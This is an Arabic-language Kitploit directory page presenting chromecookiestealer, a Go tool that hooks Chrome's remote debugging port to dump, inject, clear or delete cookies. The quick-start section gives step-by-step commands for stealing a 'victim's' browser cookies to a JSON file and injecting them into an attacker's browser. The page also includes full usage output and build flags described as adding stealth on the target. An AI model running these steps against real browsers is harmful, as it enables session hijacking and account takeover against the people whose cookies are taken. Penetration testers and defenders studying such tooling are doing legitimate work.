Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
chromecookiestealer — سرقة/حقن كعكات Chrome عبر بروتوكول DevTools (--remote-debugging-port). | Kitploit
أدوات/GitHubGitHub/magisterquis/chromecookiestealer
تسريب البياناتجمع المعلوماتأمن الويباختبار الاختراق
GitHubmagisterquis/chromecookiestealer

chromecookiestealer

سرقة/حقن كعكات Chrome عبر بروتوكول DevTools (--remote-debugging-port).

عرض المستودع
11514منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

سارق ملفات تعريف الارتباط في كروم (وحاقنها)

يرتبط بكروم باستخدام بروتوكول أدوات المطور عن بُعد (Remote DevTools protocol) ويقوم بسرقة/حقن/مسح/حذف ملفات تعريف الارتباط.

مستوحى بشدة من WhiteChocolateMacademiaNut.

يتم تفريغ ملفات تعريف الارتباط ككائنات JSON باستخدام تنسيق كروم الخاص. يُستخدم نفس التنسيق لتحميل ملفات تعريف الارتباط.

للاستخدام القانوني فقط.

الميزات

  • تفريغ ملفات تعريف الارتباط في كروم
  • حقن ملفات تعريف الارتباط المُفرغة في نسخة (أخرى) من كروم
  • مسح ملفات تعريف الارتباط في كروم
  • إعداد القيم الافتراضية في وقت الترجمة

بداية سريعة

سرقة ملفات تعريف الارتباط للضحية:

root@kitploit:~
git clone https://github.com/magisterquis/chromecookiestealer.git
cd chromecookiestealer
go build
pkill Chrome
/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222 --restore-last-session # يختلف حسب الهدف
./chromecookiestealer -dump ./cookies.json

الحقن في المتصفح المحلي للمهاجم:

root@kitploit:~
# ابدأ كروم بمنفذ التصحيح، كما في الأعلى.
./chromecookiestealer -clear -inject ./cookies.json

الاستخدام

root@kitploit:~
Usage: chromecookiestealer [options]
Attaches to Chrome using the Remote DevTools Protocol (--remote-debugging-port)
and, in order and as requested:

- Dumps cookies
- Clears cookies
- Injects cookies
- Deletes selected cookies

Parameters for cookies to be deleted should be represented as an array of JSON
objects with the following string fields:

name   - Name of the cookies to remove.
url    - If specified, deletes all the cookies with the given name where domain
         and path match provided URL.
domain - If specified, deletes only cookies with the exact domain.
path   - If specified, deletes only cookies with the exact path.

Filenames may also be "-" for stdin/stdout.

Options:
  -chrome URL
    	Chrome remote debugging URL (default "ws://127.0.0.1:9222")
  -clear
    	Clear browser cookies
  -delete file
    	Name of file containing parameters for cookies to delete
  -dump file
    	Name of file to which to dump stolen cookies
  -inject file
    	Name of file containing cookies to inject
  -no-summary
    	Don't print a summary on exit
  -verbose
    	Enable verbose logging

البناء

يجب أن يكون go build كافياً. يمكن تعيين ما يلي في وقت الترجمة باستخدام -ldflags '-X main.Foo=bar' لمزيد من التخفي عند الهدف.

المتغير

لا شيء مما سبق مضبوط افتراضياً.

بروتوكول أدوات المطور في كروم (Chrome DevTools Protocol) متغير بعض الشيء. قد يكون من الضروري استخدام إصدار أحدث من مكتبات chromedp و cdproto إذا توقف هذا البرنامج عن العمل. يمكن القيام بذلك باستخدام

root@kitploit:~
go get -u -v all
go mod tidy
go build

والذي قد يكون له أثر جانبي يتمثل في تعطيل كل شيء آخر.

¯\_(ツ)_/¯

تنزيل الأداة
الوصف
DumpFileاسم ملف لتفريغ ملفات تعريف الارتباط إليه. يستلزم -dump
InjectFileاسم ملف لحقن ملفات تعريف الارتباط منه. يستلزم -inject
DeleteFileاسم ملف به معاملات تصف ملفات تعريف الارتباط المراد حذفها. يستلزم -delete
DoClearإذا تم تعيينه لأي قيمة، يستلزم -clear